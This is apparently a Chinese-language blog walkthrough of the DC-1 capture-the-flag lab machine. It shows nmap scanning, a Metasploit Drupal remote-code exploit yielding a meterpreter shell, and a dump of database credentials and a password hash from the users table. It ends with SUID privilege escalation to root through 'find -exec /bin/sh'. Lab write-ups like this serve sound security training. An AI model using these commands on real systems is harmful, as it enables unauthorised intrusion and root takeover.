目录
下载地址:
信息收集
靶机界面

确认攻击机与dc-1在同一网段,查看mac地址

主机发现
查看靶机IP
sudo arp-scan -l

详细扫描端口信息
sudo nmap -A -p- -sS -sC -T4 10.4.7.144

端口信息
| 22/tcp | open | ssh | OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.2.22 ((Debian)) |
| 111/tcp | open | rpcbind | 2-4 (RPC #100000) |
| 41771/tcp | open | status | 1 (RPC #100024) |
这边可以看到靶机的22 80 111和51771端口是开放的
网站信息
访问下dc-1网页

Drupal是一种开源的内容管理系统
用msf查找下DRupal的漏洞
漏洞扫描
进入msf
msfconsole
搜索drupal的漏洞
search drupal

通过该模块,攻击者可以利用漏洞执行远程命令,进而控制受影响的Drupal网站。
切换到该模块
use 1
查看漏洞信息
show options

漏洞利用
用set命令设置rhosts文件,指定靶机的ip地址
set rhosts 10.4.7.144
然后exploit进行攻击

成功后会获得一个meterpreter的shell
(meterpreter它是一种轻量级的后门程序,可用于远程访问受攻击系统,执行各种操作和操纵受感染的主机。)
渗透过程
pwd 查看当前所在我路径
ls 查看所在路径的文件

flag1
可以看到这边有个flag1.txt的文件
看下里面的内容

这边提示要去找CMS中的一个配置文件
shell(以靶机用户的身份运行靶机)
这边可以开启python交互式看的比较舒服
python -c "import pty;pty.spawn( '/bin/bash')"

这边也没什么有用信息
直接去找他的配置文件
find ./ -name "*settings*"

flag2
查看一下这个默认文件

看到了flag2文件,flag2中提示我们暴力破解不可取并且需要提权。
还有一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。

database(数据库)=drupaldb(名称)
username(用户名)=dbuser(数据库用户名)
password(密码)=R0ck3t
登入数据库
mysql -udbuser -pR0ck3t

查看当前数据库
show databases;

切换到drupaldb
use drupaldb;

查看当前数据库的表
show tables;

这边有个users表,里面应该是存储网站注册用户的信息表
看一下
select*from users;

表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式
$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
在网页找个解码器解码

登录网站试一下

flag3
登录成功,看下有什么有用信息


这边flag3提示要用find提权
flag4
回到终端find下flag4
find / -name "*flag*"

看下里面有什么
cat /home/flag4/flag4.txt

想让我们找到一个find的文件,可能是最后一个flag
看一下SUID可执行的文件
find / -perm -u=s -type f 2>/dev/null

在/usr/bin/下有个find文件
看下这个文件

这边显示当前用户没有权限查看该文件
权限提升
flnd提权
mkdir ymmy
find ymmy -exec 'whoami' \;
root
find ymmy -exec '/bin/bash' \;
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
find ymmy -exec '/bin/sh' \;
id
uid=33(www-data) gid=33(www-data) euid=0(root)groups=0(root),33(www-data)
提权过程
find 命令结合 -exec 参数来执行不同的命令
-exec:对匹配的文件执行该参数所给出的shell命令。形式为command {} ;。
1.find ymmy -exec 'whoami' \;:这个命令尝试在 ymmy目录下执行 whoami 命令,结果显示当前是 root 用户。
2.find ymmy -exec '/bin/bash' \;:这个命令尝试在 ymmy 目录下执行 /bin/bash 命令。然后,使用了 id 命令来查看当前用户的身份信息,结果显示您是以 www-data 用户身份执行的
3.find ymmy -exec '/bin/sh' \;:这个命令尝试在 ymmy"目录下执行 /bin/sh 命令。然后,您再次使用了 id 命令来查看当前用户的身份信息,结果显示您以 root 用户身份执行了 /bin/sh 命令。
flag5

1733

被折叠的 条评论
为什么被折叠?



